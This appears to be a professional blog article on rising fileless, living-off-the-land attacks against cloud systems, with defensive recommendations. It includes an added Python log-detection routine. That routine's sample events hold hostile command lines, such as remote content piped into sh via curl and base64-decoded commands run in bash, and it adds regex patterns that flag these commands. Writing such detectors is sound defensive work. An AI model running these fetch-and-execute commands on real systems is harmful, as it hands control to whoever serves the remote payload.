Emerging Cloud Security Threats: Fileless Attacks on the Rise

Author: Binita Patel, GIAC GCLD, CompTIA Security+
Date Published: 20 July 2023

Scalability, flexibility, agility, high performance and user-friendliness have helped organizations pivot toward cloud computing. Cloud is a dynamic landscape that keeps evolving, bringing with it complexities that lead to security concerns. One of the notable recent challenges has been fileless attack techniques, which use legitimate software already present on a machine to compromise it.

Since these attacks do not rely on files written to disk, no installation is required, which makes them hard to detect. They are also known as Living off the Land (LotL) attacks, because they abuse legitimate binaries already present on the system (LOLBins). There has been a whopping 1,400 percent increase in fileless attacks in 2022, according to the recent Aqua Nautilus Cybersecurity Report. Those totals include a highly sophisticated campaign – the “HeadCrab Campaign.” The custom-made malware used by the threat actor has at least 1,200 Redis servers under its control. These compromised servers are suspected to have cryptocurrency miners installed on them.

Public cloud misconfigurations remain the most popular way for threat actors to break in. There are hundreds of thousands of misconfigured cloud resources, including servers, APIs and containers that are exposed to the world.

The Aqua Nautilus Cybersecurity Report also indicates that software supply chain attacks saw an increase of 300 percent, year-over-year. Adversaries are now focusing on evading defense systems and obscuring their campaigns in order to establish a foothold in compromised systems. So, what can we do to strengthen our defenses?

Regular monitoring and analysis. Collect and analyze logs from the various infrastructure elements and cloud services. A security information and event management (SIEM) system, together with a user behavior analytics (UBA) tool, can help detect and respond to malicious activity. An intrusion detection and prevention system (IDPS) monitors network traffic for suspicious activity and also has the ability to block it.
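As an added example (not part of the original article), here is a small Python detection routine of the kind such log analysis would run: it scans constructed process-execution events for living-off-the-land behaviour, such as a Redis server process spawning a shell, or remote content or a decoded command being piped straight into an interpreter without ever being written to disk. The event field names, host names and the 203.0.113.0/24 addresses are assumptions.

```python
import json
import re
from collections import namedtuple

# Process-execution events in the JSON shape a cloud runtime sensor or audit log
# might emit (field names are assumed). The events themselves are constructed for
# this example and use documentation-range addresses, not real indicators.
SAMPLE_EVENTS = [
    '{"host":"redis-01","ppname":"redis-server","pname":"sh","cmd":"sh -c \'curl -s http://203.0.113.10/run | sh\'"}',
    '{"host":"redis-01","ppname":"sh","pname":"curl","cmd":"curl -s http://203.0.113.10/run"}',
    '{"host":"web-02","ppname":"systemd","pname":"bash","cmd":"bash -c \'echo aGVsbG8= | base64 -d | bash\'"}',
    '{"host":"web-02","ppname":"bash","pname":"ls","cmd":"ls -la /var/log"}',
    'not json at all',
]

Finding = namedtuple("Finding", "host rule cmd")

# Service daemons that have no business launching an interactive shell.
SERVICE_PARENTS = {"redis-server", "nginx", "httpd", "java", "node"}
SHELLS = {"sh", "bash", "dash", "zsh"}
# Remote content fed to an interpreter through a pipe: nothing touches disk.
PIPE_TO_INTERP = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sh|bash|python3?|perl)\b")
# An encoded payload decoded in memory and executed directly.
INLINE_ENCODED = re.compile(r"\bbase64\b\s+(-d|--decode)\s*\|\s*(sh|bash)\b")


def detect(event: dict) -> list:
    """Return every living-off-the-land rule a single event triggers."""
    findings = []
    if event["ppname"] in SERVICE_PARENTS and event["pname"] in SHELLS:
        findings.append(Finding(event["host"], "service-spawned-shell", event["cmd"]))
    if PIPE_TO_INTERP.search(event["cmd"]):
        findings.append(Finding(event["host"], "remote-content-piped-to-interpreter", event["cmd"]))
    if INLINE_ENCODED.search(event["cmd"]):
        findings.append(Finding(event["host"], "encoded-command-executed-in-memory", event["cmd"]))
    return findings


def scan(lines) -> list:
    """Parse each log line and collect findings; malformed lines are skipped, not fatal."""
    results = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        results.extend(detect(event))
    return results


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host}: {f.cmd}")
```

In practice the rule output would be forwarded to the SIEM as an alert, with the parent process, host and command line preserved for triage.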

Fix misconfigurations. Establish baseline configurations. Industry standards, like CIS benchmarks and NIST, provide a good starting point. Monitor for misconfigurations and fix them in a timely manner to avoid the risk of being exposed or vulnerable to attacks. A cloud security posture management (CSPM) tool can aid with minimizing misconfigurations and monitoring them against a tolerable baseline.

Remediate vulnerabilities. An effective vulnerability management program must be established to reduce the risk of vulnerabilities getting exploited. Zero-day vulnerabilities must be triaged, and appropriate steps must be taken to protect vulnerable systems and reduce risk to the organization.

Protect the supply chain. Organizations must ensure adequate processes, procedures, policies and documentation are in place for protecting systems that are dependent on the software supply chain.

Explore training and education. Last but not least, training and education are extremely important. With cloud computing constantly evolving and software increasingly interdependent, education helps individuals stay up to date and play their part in creating a secure environment.

Editor’s note: For more cloud resources from ISACA, explore the Cloud Fundamentals Certificate and the Certificate of Cloud Auditing Knowledge.